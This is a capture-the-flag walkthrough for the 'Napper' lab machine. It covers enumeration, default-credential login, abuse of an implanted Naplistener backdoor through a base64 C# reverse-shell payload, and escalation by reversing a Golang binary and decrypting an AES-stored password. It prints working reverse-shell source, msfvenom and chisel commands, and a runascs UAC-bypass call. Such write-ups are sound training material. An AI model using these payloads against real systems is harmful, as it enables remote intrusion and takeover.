Week 7. Napper
TL;DR
This is a Windows 10 pro workstation used by a group of malware researchers. For their investigations, they run a blog to post their findings and an internal Elasticsearch server. They are currently researching the Naplistener malware and it seems that, unfortunately, the software has infected the machine leaving it exposed to external attacks, this can be leveraged for user foothold. Regarding escalation, reversing a local binary written in Golang allows finding credentials for local administrator.
KEYWORDS
Naplistener, C#, Elasticsearch, reversing, Golang, AES.
REFERENCES
https://www.sslchecker.com/certdecoder
https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph
https://thehackernews.com/2023/03/new-naplistener-malware-used-by-ref2924.html
https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension
https://gist.github.com/fracasula/38aa1a4e7481f9cedfa78a0cdd5f1865
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-12 04:32 EST
Nmap scan report for 10.129.160.140
Host is up, received user-set (0.098s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
80/tcp open http syn-ack
443/tcp open https syn-ack
7680/tcp open pando-pub syn-ack
Nmap done: 1 IP address (1 host up) scanned in 118.89 secondsEnumerate the open ports.
> nmap $target -p80,443,7680 -sV -sC -Pn -vv
Nmap scan report for 10.129.160.140
Host is up, received user-set (0.093s latency).
Scanned at 2023-11-12 04:36:28 EST for 53s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to https://app.napper.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_ssl-date: 2023-11-12T09:37:27+00:00; +7s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=app.napper.htb/organizationName=MLopsHub/stateOrProvinceName=California/countryName=US/organizationalUnitName=MlopsHub Dev/localityName=San Fransisco
| Subject Alternative Name: DNS:app.napper.htb
| Issuer: commonName=ca.napper.htb/countryName=US/localityName=San Fransisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-07T14:58:55
| Not valid after: 2033-06-04T14:58:55
| MD5: ee1adff89a6f5ddd1add9d22040858dc
| SHA-1: f134fe3831f50c749a26d44163a8232da67a782b
| -----BEGIN CERTIFICATE-----
| MIIDzTCCArWgAwIBAgIJALM7fwOVfMaCMA0GCSqGSIb3DQEBCwUAMD0xFjAUBgNV
| BAMMDWNhLm5hcHBlci5odGIxCzAJBgNVBAYTAlVTMRYwFAYDVQQHDA1TYW4gRnJh
| bnNpc2NvMB4XDTIzMDYwNzE0NTg1NVoXDTMzMDYwNDE0NTg1NVowfTELMAkGA1UE
| BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuc2lz
| Y28xETAPBgNVBAoMCE1Mb3BzSHViMRUwEwYDVQQLDAxNbG9wc0h1YiBEZXYxFzAV
| BgNVBAMMDmFwcC5uYXBwZXIuaHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
| CgKCAQEAqkM19E9lbE476qF6RBriuwNHdCgjwLybb9pXWIgtPen6hNCBvzp0XLlY
| ZWJ3NNszYH7Z6pgDJHCDIrSZXtkAEHh7AdoN7ZFLWScHwz/qWesBjH2DYHfBABkm
| qorv3dS6MqpZXJK81e1bQdS9IlRiPmJTYHX17+vfd7FBP2XaARtpgDIkDEPyPIIe
| GfTbtk3/E3N/EjZX7lR7lgAMhZmpEpmb7AoQ1btPraFwH/PXG5r020vfC+fCzgAK
| X3BmCfSzUI2AXz/2GJrRsSSdjKTCLJgn5Cau9bI+IO9pH3HOkfXDiWLB4ip++dGK
| hxYMEc5xwrcF3ZsE6s42cisD8pNipwIDAQABo4GPMIGMMFcGA1UdIwRQME6hQaQ/
| MD0xFjAUBgNVBAMMDWNhLm5hcHBlci5odGIxCzAJBgNVBAYTAlVTMRYwFAYDVQQH
| DA1TYW4gRnJhbnNpc2NvggkA4xs9TVmYevYwCQYDVR0TBAIwADALBgNVHQ8EBAMC
| BPAwGQYDVR0RBBIwEIIOYXBwLm5hcHBlci5odGIwDQYJKoZIhvcNAQELBQADggEB
| ABuy5lV920FJXR4j0dWSAqpEPCXj3jVc7vbozP24sFAocNCzodYiuKV10NyhXxJ+
| rxgu5HgmWk47yaz17eYwMDWYnfoIGRVMl4IkSve/9wr1+ReiywIPGyCG/GCxk3KI
| OG/IyX9j8KR7bhTnlMPixVVqkAu0E2CwZ8I0WmjBdQzEs4wBmpmRO5Eqodxf/jkM
| 3a7CU0Q3m9+SKwOnvarn0Wp++UmlD4/y+O8+j9+URXtD7RElZfrcv9wknVGD7H0s
| U98Kn5WCVanMjGtaQmBjCNdTX/6rif90qiTgyw3mGw8IyatfXAwF75jkvB4vTAHk
| ziVXyfoozsWvOoF8/YiMKsI=
|_-----END CERTIFICATE-----
|_http-generator: Hugo 0.112.3
7680/tcp open pando-pub? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6s
Nmap done: 1 IP address (1 host up) scanned in 53.05 secondsInspect the certificate with https://www.sslchecker.com/certdecoder
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
b3:3b:7f:03:95:7c:c6:82
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=ca.napper.htb, C=US, L=San Fransisco
Validity
Not Before: Jun 7 14:58:55 2023 GMT
Not After : Jun 4 14:58:55 2033 GMT
Subject: C=US, ST=California, L=San Fransisco, O=MLopsHub, OU=MlopsHub Dev, CN=app.napper.htb
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:aa:43:35:f4:4f:65:6c:4e:3b:ea:a1:7a:44:1a:
e2:bb:03:47:74:28:23:c0:bc:9b:6f:da:57:58:88:
2d:3d:e9:fa:84:d0:81:bf:3a:74:5c:b9:58:65:62:
77:34:db:33:60:7e:d9:ea:98:03:24:70:83:22:b4:
99:5e:d9:00:10:78:7b:01:da:0d:ed:91:4b:59:27:
07:c3:3f:ea:59:eb:01:8c:7d:83:60:77:c1:00:19:
26:aa:8a:ef:dd:d4:ba:32:aa:59:5c:92:bc:d5:ed:
5b:41:d4:bd:22:54:62:3e:62:53:60:75:f5:ef:eb:
df:77:b1:41:3f:65:da:01:1b:69:80:32:24:0c:43:
f2:3c:82:1e:19:f4:db:b6:4d:ff:13:73:7f:12:36:
57:ee:54:7b:96:00:0c:85:99:a9:12:99:9b:ec:0a:
10:d5:bb:4f:ad:a1:70:1f:f3:d7:1b:9a:f4:db:4b:
df:0b:e7:c2:ce:00:0a:5f:70:66:09:f4:b3:50:8d:
80:5f:3f:f6:18:9a:d1:b1:24:9d:8c:a4:c2:2c:98:
27:e4:26:ae:f5:b2:3e:20:ef:69:1f:71:ce:91:f5:
c3:89:62:c1:e2:2a:7e:f9:d1:8a:87:16:0c:11:ce:
71:c2:b7:05:dd:9b:04:ea:ce:36:72:2b:03:f2:93:
62:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=ca.napper.htb/C=US/L=San Fransisco
serial:E3:1B:3D:4D:59:98:7A:F6
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment
X509v3 Subject Alternative Name:
DNS:***app.napper.htb***
Signature Algorithm: sha256WithRSAEncryption
1b:b2:e6:55:7d:db:41:49:5d:1e:23:d1:d5:92:02:aa:44:3c:
25:e3:de:35:5c:ee:f6:e8:cc:fd:b8:b0:50:28:70:d0:b3:a1:
d6:22:b8:a5:75:d0:dc:a1:5f:12:7e:af:18:2e:e4:78:26:5a:
4e:3b:c9:ac:f5:ed:e6:30:30:35:98:9d:fa:08:19:15:4c:97:
82:24:4a:f7:bf:f7:0a:f5:f9:17:a2:cb:02:0f:1b:20:86:fc:
60:b1:93:72:88:38:6f:c8:c9:7f:63:f0:a4:7b:6e:14:e7:94:
c3:e2:c5:55:6a:90:0b:b4:13:60:b0:67:c2:34:5a:68:c1:75:
0c:c4:b3:8c:01:9a:99:91:3b:91:2a:a1:dc:5f:fe:39:0c:dd:
ae:c2:53:44:37:9b:df:92:2b:03:a7:bd:aa:e7:d1:6a:7e:f9:
49:a5:0f:8f:f2:f8:ef:3e:8f:df:94:45:7b:43:ed:11:25:65:
fa:dc:bf:dc:24:9d:51:83:ec:7d:2c:53:df:0a:9f:95:82:55:
a9:cc:8c:6b:5a:42:60:63:08:d7:53:5f:fe:ab:89:ff:74:aa:
24:e0:cb:0d:e6:1b:0f:08:c9:ab:5f:5c:0c:05:ef:98:e4:bc:
1e:2f:4c:01:e4:ce:25:57:c9:fa:28:ce:c5:af:3a:81:7c:fd:
88:8c:2a:c2Take note of the subdomain app.napper.htb. We can enumerate further subdomains with ffuf
> ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --fs 5602 -t 100 -u https://napper.htb -H "Host: FUZZ.napper.htb"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://napper.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.napper.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 5602
________________________________________________
internal [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 102ms]
:: Progress: [4989/4989] :: Job [1/1] :: 734 req/sec :: Duration: [0:00:07] :: Errors: 0 ::We have found another subdomain called internal.napper.htb. If we browse it with Firefox, a login web page appears.
Browsing the login site with Burpsuite, we see it uses basic authorization. In this type of authorization the credentials are sent in base64. The next step would be to find valid credentials for this site. In the blog app.napper.htb there are information about how the basic authorization works.
USER
We find the procedure they followed to configure the server, including the default password used.
Trying these credentials example:ExamplePassword in the login page, we are given access to the internal area. Inside the restricted area we find out there is an investigation ongoing on a malware called Naplistener. Doing a search in Internet, we find out 2 good resources to have a basic understanding of this malware.
https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph
https://thehackernews.com/2023/03/new-naplistener-malware-used-by-ref2924.html
In summary, it is a malware written in C# which starts an HTTP listener in the infected machines. Once the listener is running, if you send base64 encoded C# payloads to certain endpoint, it will be executed in memory. It is designed to masquerade and evade network-based detection methods, for this same reason, it will only process requests sent to /ews/MsExgHealthCheckd/, in the sdafwe3rwe23 parameter. Any other tries to interact with Naplistener will be responded with a 404 code.
To verify if Naplistener is running in the host, we send a base64 aaa payload to the endpoint and it is responded with OK 200. Therefore, Naplistener is running in the system.
We conclude that if we send a base64-encoded C# reverse shell it will be decoded by Naplistener and executed.
Next step is to download a C# TCP shell from http://www.revshells.com. Bear in mind it cannot be used off-the-self, it needs some modifications.
Namespace must match filename.
It must contain a
Runclass.Create a constructor and place the shell code inside, so it is automatically invoked whenever an instance of the class is created.
The
main()point of entry will just call the constructor.
An example of the payload could be the following:
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace Present
{
public class Run
{
static StreamWriter streamWriter;
public Run()
{
using(TcpClient client = new TcpClient("10.10.14.20", 9001))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
public static void Main(string[] args)
{
new Run();
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}Compile with mcs, remember the filename must match the namespace.
> mcs -out:Present.exe Present.cs
present.cs(69,34): warning CS0168: The variable `err' is declared but never used
Compilation succeeded - 1 warning(s)Encode base64 the resulting binary.
> base64 -w 0 ./Present.exeSend the payload with Burpsuite, don't forget to URL-encode to avoid problematic characters.
A reverse shell for user ruben is received.
SYSTEM
Enumerate the system.
> systeminfo
Host Name: NAPPER
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
System Type: x64-based PCEnumerating with winpeas.exe, a binary is discovered in a folder for which we have write access.
> C:\Temp\www\internal\content\posts\internal-laps-alpha\a.exeIn this folder there is also an .env file containing credentials.
> C:\Temp\www\internal\content\posts\internal-laps-alpha>type .env
ELASTICUSER=user
ELASTICPASS=DumpPassword\$Here
ELASTICURI=https://127.0.0.1:9200We also find a local service running on port 9200, doing some research, we find out this port is owned by Elasticsearch. Place a chisel and forward port 9200 to Kali.
./chisel64 server -p 8000 --reverse
chisel64.exe client 10.10.14.20:8000 R:9200Browsing the site locally with Firefox https://localhost:9200, an Elasticsearch login website appears.
Next step is to decompile the a.exe file with a reversing tool. The file turns out to have been written in Golang.
Conclusions after inspecting the source code:
If you use Ghidra, look for a Golang extension to assist in decompiling process.
The binary reads environmental variables from the
.envfile.In the source you can find credentials for
elasticuser.The binary updates password for user
backup, which is written in a JSON field calledblob
Use the elastic user credentials to log into the Elasticsearch site. Query thehttps://localhost:9200/_search endpoint to find the blob parameter, which contains the encoded current password for user backup and the seed used to AES encode it.
Once both parameters are retrieved, we can decode the backup user password. For this, it is needed to create our own go script, one good starting point can be found here: https://gist.github.com/fracasula/38aa1a4e7481f9cedfa78a0cdd5f1865
Also, bear in mind that password for user backup is updated periodically.
Once the password is obtained, we just need to log in as user backup. There are no open ports 135, 445, 3389, 5985, so Impacket, rdesktop and evil-winrm are discarded. A good alternative could be runascs with a payload generated with msfvenom
> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.20 lport=9000 -f exe -a x64 --platform windows -o shell.exe Start a listener on port 9000 and use runascs to run the shell.exe payload as backup user.
> runascs.exe backup xiwPzcjGQJgwQYFBKNphoChSXzPXcUroEDqqjIBF shell.exe -t 8 --bypass-uacYou are root.
Last updated